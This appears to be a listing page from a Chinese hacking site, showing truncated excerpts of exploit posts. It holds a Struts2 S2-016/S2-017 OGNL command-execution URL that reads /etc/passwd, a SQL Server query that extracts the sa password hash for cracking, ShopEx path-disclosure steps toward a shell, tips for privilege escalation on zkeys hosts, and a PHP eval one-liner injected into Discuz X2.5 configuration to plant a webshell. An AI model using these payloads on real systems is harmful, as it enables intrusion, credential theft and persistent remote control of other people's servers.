Struts2 S2-016/S2-017 exp整理
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。 喜欢就点一下感谢吧^_^ 带回显命令执行: https://www.webshell.cc/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passw...
各种类型数据库抓HASH破解最高权限密码!
SQL Server 2000:- SELECT password from master.dbo.sysxlogins where name='sa' 0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341 2FD54D6119FFF04129A1D72E7C3194F7284A7F3A 0×0100- constant header 347...
shopex前台普通用户getshell最新漏洞
第一个:想办法找到目标网站的绝对路径 https://www.webshell.cc/install/svinfo.php?phpinfo=true https://www.webshell.cc/core/api/shop_api.php https://www.webshell.cc/core/api/site/2.0/api_b2b_2_0_cat.php http://www.webshell....
zkysoft 主机提权方法
zkeys 默认网站用户权限很低,大部分exp都用不了,如 iis6 exp 就提示无法设置注册表。 提供我成功过的几个方法(不一定有效): 1、如果目标仅仅是旁站的话可以去注册表查 serv-u 的指定用户密码,注册表地址:HKEY_LOCAL_MACHINESOFTWAREcat softserv-u 2、如果要提权的话可以找找有 winwebmail 没,这个东西有的 zkey...
discuz X2.5后台拿shell及修复
有管理员帐号及密码。 直接在UCenter IP 地址:里面插入一句话 xxoo\');eval($_POST[a])?>;// 就ok 然后菜刀连接https://www.webshell.cc/config/config_ucenter.php密码a , 测试通过